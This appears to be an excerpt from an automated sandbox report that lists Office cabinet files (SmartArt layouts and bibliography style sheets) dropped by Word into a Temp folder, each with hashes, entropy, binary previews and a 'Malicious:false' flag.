                                                                                                                                                SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CA2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):25314
                                                                                                                                                Entropy (8bit):7.729848360340861
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                                SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CB2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20235
                                                                                                                                                Entropy (8bit):7.61176626859621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CB3.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23597
                                                                                                                                                Entropy (8bit):7.692965575678876
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CB4.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22008
                                                                                                                                                Entropy (8bit):7.662386258803613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CB5.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21111
                                                                                                                                                Entropy (8bit):7.6297992466897675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CC6.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31605
                                                                                                                                                Entropy (8bit):7.820497014278096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CC7.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21791
                                                                                                                                                Entropy (8bit):7.65837691872985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CC8.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31835
                                                                                                                                                Entropy (8bit):7.81952379746457
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CC9.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):28911
                                                                                                                                                Entropy (8bit):7.7784119983764715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CD9.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31471
                                                                                                                                                Entropy (8bit):7.818389271364328
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDA.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20554
                                                                                                                                                Entropy (8bit):7.612044504501488
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDB.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31482
                                                                                                                                                Entropy (8bit):7.808057272318224
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                Malicious:false
